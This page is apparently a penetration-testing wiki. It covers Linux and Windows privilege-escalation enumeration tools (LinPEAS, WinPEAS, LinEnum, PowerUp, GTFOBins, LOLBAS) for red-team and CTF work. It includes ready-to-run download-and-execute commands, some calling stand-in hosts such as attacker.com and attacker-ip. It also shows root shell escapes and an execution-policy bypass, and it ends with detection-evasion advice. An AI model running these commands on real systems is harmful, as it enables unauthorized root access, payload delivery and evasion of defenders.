Automated Enumeration Tools

Automated enumeration tools are essential for efficient privilege escalation reconnaissance. They systematically scan systems for misconfigurations, vulnerable services, and escalation vectors that might be missed during manual enumeration.

LinPEAS (Linux Privilege Escalation Awesome Script)

Overview

LinPEAS is a comprehensive privilege escalation enumeration script for Linux systems. It performs extensive automated checks and highlights potential privilege escalation vectors with color-coded output.

Key Features

Comprehensive scanning of system configurations, services, and file permissions
Color-coded output to prioritize findings (red = critical, yellow = interesting)
Modular checks covering kernel exploits, SUID/SGID files, cron jobs, and more
Network enumeration including listening services and network connections
Container detection for Docker and other containerized environments

Download and Transfer Methods

# Direct download (if target has internet access)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Download to attacking machine first
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

# Transfer via HTTP server
python3 -m http.server 8000
# On target: curl http://attacker-ip:8000/linpeas.sh | bash

# Transfer via netcat
nc -q 5 -lvnp 4444 < linpeas.sh
# On target: cat < /dev/tcp/attacker-ip/4444 | sh

Basic Execution

# Standard execution
chmod +x linpeas.sh
./linpeas.sh

# Save output to file
./linpeas.sh | tee linpeas_output.txt

# Extended checks (recommended for CTFs)
./linpeas.sh -a | tee linpeas_full.txt

Key LinPEAS Checks

System Information: Kernel version, OS details, installed software packages

File Permissions: SUID/SGID binaries, world-writable files, interesting file permissions

Process Analysis: Running processes, cron jobs, systemd timers

Network Information: Open ports, network connections, listening services

User Information: User accounts, group memberships, sudo permissions

Software Analysis: Installed packages, vulnerable software versions

Output Interpretation

Color Coding System:

Red: Critical findings requiring immediate attention (99% privilege escalation vector)
Yellow: Important findings worth investigating
Light Cyan: Users with console access
Blue: Users without console access and mounted devices
Green: Common findings (users, groups, SUID/SGID files)
Light Magenta: Current user information

WinPEAS (Windows Privilege Escalation Awesome Script)

Overview

WinPEAS is the Windows counterpart to LinPEAS, designed specifically for Windows environments to identify privilege escalation opportunities through automated system enumeration.

Key Features

Service Enumeration: Identifies vulnerable services, unquoted service paths, and service permissions

Registry Analysis: Scans registry for misconfigurations and stored credentials

File System Analysis: Checks for writable directories, interesting files, and cached credentials

User and Group Analysis: Enumerates user accounts, group memberships, and privileges

Network Configuration: Analyzes network settings, open ports, and connections

Scheduled Tasks: Identifies potentially exploitable scheduled tasks and cron jobs

Download and Transfer

# Download latest WinPEAS executable
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe

# Transfer via HTTP (on attacking machine)
python3 -m http.server 8000

# On target Windows machine
powershell.exe -c "IWR -Uri http://attacker-ip:8000/winPEASx64.exe -OutFile winPEAS.exe"

# Alternative download method
certutil -urlcache -split -f http://attacker-ip:8000/winPEASx64.exe winPEAS.exe

Basic Execution

# Standard execution
.\winPEAS.exe

# Save output to file
.\winPEAS.exe > results.txt

# Extended search (includes password hunting)
.\winPEAS.exe searchall > full_results.txt

# Quick execution for time-sensitive scenarios
.\winPEAS.exe fast

WinPEAS Variants

winPEASx64.exe: For 64-bit Windows systems (recommended)

winPEASx86.exe: For 32-bit Windows systems

winPEAS.bat: Batch script version for older systems without .NET Framework

winPEASany.exe: Universal executable that works on any architecture

LinEnum and PowerUp

LinEnum Overview

LinEnum is a scripted local Linux enumeration tool designed to identify privilege escalation opportunities through comprehensive system analysis.

Key Features

Performs over 65 automated privilege escalation checks
Highlights potential vulnerabilities in yellow text for easy identification
Includes experimental reporting functionality for formatted output
Searches through configuration and log files for keywords
Analyzes kernel information, SUID/SGID files, and sudo misconfigurations

Basic Usage

# Download LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

# Transfer and execute
python3 -m http.server 8000
# On target: wget http://attacker-ip:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Save output to file
./LinEnum.sh > linenum_results.txt

# Thorough scan (slower but more comprehensive)
./LinEnum.sh -t

# Search for specific keywords in files
./LinEnum.sh -k password

Key Sections of LinEnum Output

Kernel Information: Identifies potential kernel exploits
Environmental Variables: Checks PATH and other environment settings
Jobs/Tasks: Analyzes cron jobs and scheduled tasks for privilege escalation
Networking: Lists open ports and network configuration
Services: Identifies running services and their configurations
SUID Files: Locates binaries with special permissions that can be exploited

PowerUp Overview

PowerUp is a PowerShell script designed for Windows privilege escalation that focuses on common misconfigurations and vulnerabilities.

Key Features

Service Analysis: Identifies vulnerable services with weak permissions and unquoted service paths
Registry Analysis: Checks for registry misconfigurations that can be exploited
File Permissions: Analyzes file and folder permissions for potential write access
AlwaysInstallElevated: Checks for MSI installation privilege escalation
UAC Bypass: Identifies UAC bypass opportunities

Basic Usage

# Download and execute PowerUp
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')

# Run all checks
Invoke-AllChecks

# Save output to file
Invoke-AllChecks | Out-File -FilePath powerup_results.txt

# Execute with bypass for execution policy
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"

Key PowerUp Functions

Get-UnquotedService: Identifies services with unquoted paths
Get-ServiceFilePermission: Checks service binary permissions
Get-ServicePermission: Analyzes service configuration permissions
Get-RegAlwaysInstallElevated: Checks for AlwaysInstallElevated registry keys
Invoke-ServiceAbuse: Automatically exploits vulnerable services

GTFOBins and LOLBAS

GTFOBins Overview

GTFOBins (GTFObins.github.io) is a curated list of Unix binaries that can be exploited to break out of restricted shells, escalate privileges, or bypass security controls.

Key Categories

SUID Exploitation: Binaries with SUID bit set that can be abused for privilege escalation
Sudo Abuse: Programs allowed via sudo that can be exploited to gain root access
Capabilities: Binaries with Linux capabilities that can be leveraged
Shell Escapes: Methods to break out of restricted shells
File Operations: Reading/writing sensitive files through legitimate binaries

Common GTFOBins Examples

vim/nano: Text editors that can spawn shells or read sensitive files
find: File search utility that can execute commands with elevated privileges
wget/curl: Network tools that can read files or download/upload data
python/perl: Interpreters that can execute arbitrary code
nmap: Network scanner with scripting capabilities for privilege escalation

Usage Examples

# Check for SUID binaries
find / -type f -perm -04000 -ls 2>/dev/null

# Example: Exploiting SUID find binary
find /etc/passwd -exec /bin/sh \;

# Example: Sudo vim exploitation
sudo vim -c '!sh'

# Example: Using capabilities
/usr/bin/view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

LOLBAS Overview

LOLBAS (Living Off The Land Binaries and Scripts) is the Windows equivalent of GTFOBins, documenting legitimate Windows binaries that can be abused for malicious purposes.

Key LOLBAS Categories

Command Execution: Binaries that can execute arbitrary commands or scripts
File Operations: Tools for reading, writing, or transferring files
Network Communications: Utilities for network connections and data transfer
UAC Bypass: Methods to bypass User Account Control restrictions
Privilege Escalation: Techniques to elevate system privileges

Common LOLBAS Examples

certutil.exe: Certificate utility that can download files and decode base64 data
powershell.exe: Command-line shell and scripting language with extensive capabilities
regsvr32.exe: DLL registration tool that can execute scripts and download content
mshta.exe: HTML application host that can execute JavaScript and VBScript
rundll32.exe: Windows utility that can load and execute DLL functions

Usage Examples

# File download with certutil
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

# Execute script with regsvr32
regsvr32 /s /n /u /i:http://attacker.com/malicious.sct scrobj.dll

# Base64 decode with certutil
certutil -decode encoded_file.txt decoded_payload.exe

# PowerShell download and execute
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"

Operational Best Practices

Tool Selection Strategy

For Comprehensive Enumeration:

Start with automated tools (LinPEAS/WinPEAS) for broad coverage
Cross-reference findings with specialized tools (LinEnum/PowerUp)
Validate opportunities using GTFOBins/LOLBAS for exploitation paths
Manual verification of automated tool findings

Environment Considerations:

Network restrictions: Choose tools that work offline or have minimal dependencies
AV/EDR presence: Consider detection signatures and behavioral analysis
System resources: Some tools are resource-intensive and may impact system performance
Time constraints: Balance thoroughness with operational timelines

Integration Workflows

Standard Privilege Escalation Workflow:

Initial enumeration with LinPEAS/WinPEAS
Targeted analysis with LinEnum/PowerUp for specific vectors
Exploitation research using GTFOBins/LOLBAS
Manual verification and testing of identified paths
Documentation of successful privilege escalation vectors

Red Team Operations:

Use tools in sequence for comprehensive coverage
Maintain operational security by understanding tool footprints
Document findings for post-engagement reporting
Consider tool detection signatures in defensive environments

Key Operational Considerations

Success Indicators

Identification of vulnerable services and misconfigurations
Discovery of SUID/SGID binaries with exploitation potential
Sudo misconfigurations allowing privilege escalation
Writable directories and files in privileged locations
Cached credentials and sensitive information exposure

Common Failure Points

Proper system hardening preventing common escalation vectors
Updated systems with patched vulnerabilities
Restricted execution environments limiting tool functionality
Network segmentation preventing tool download and execution
Advanced monitoring detecting enumeration activities

Detection Evasion

File transfer methods: Use legitimate protocols and built-in tools when possible
Execution timing: Run tools during high-activity periods to blend with normal operations
Output management: Redirect output to temporary locations and clean up artifacts
Tool selection: Choose appropriate variants based on system architecture and constraints

These automated enumeration tools form the backbone of modern privilege escalation assessments, providing systematic approaches to identifying security misconfigurations and exploitable conditions across both Linux and Windows environments.

PreviousKernel exploits and dirty techniques

Last updated 5 days ago

Was this helpful?